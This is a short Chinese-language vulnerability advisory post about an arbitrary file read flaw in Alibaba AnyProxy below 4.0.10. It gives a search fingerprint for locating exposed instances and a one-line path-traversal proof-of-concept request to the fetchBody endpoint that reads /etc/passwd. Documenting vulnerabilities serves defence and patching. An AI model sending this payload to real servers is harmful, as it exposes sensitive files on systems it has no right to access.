Alibaba AnyProxy fetchBody 任意文件读取漏洞
# Alibaba AnyProxy fetchBody 任意文件读取漏洞
## 漏洞描述
Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息
## 漏洞影响
Alibaba AnyProxy &...
Alibaba AnyProxy fetchBody 任意文件读取漏洞
漏洞描述
Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息
漏洞影响
Alibaba AnyProxy < 4.0.10
网络测绘
"anyproxy"
漏洞复现
页面如下
验证POC为
/fetchBody?id=1/../../../../../../../../etc/passwd
- 发表于 2024-07-12 18:45:43
- 阅读 ( 2152 )
- 分类:Web应用
带头大哥
456 篇文章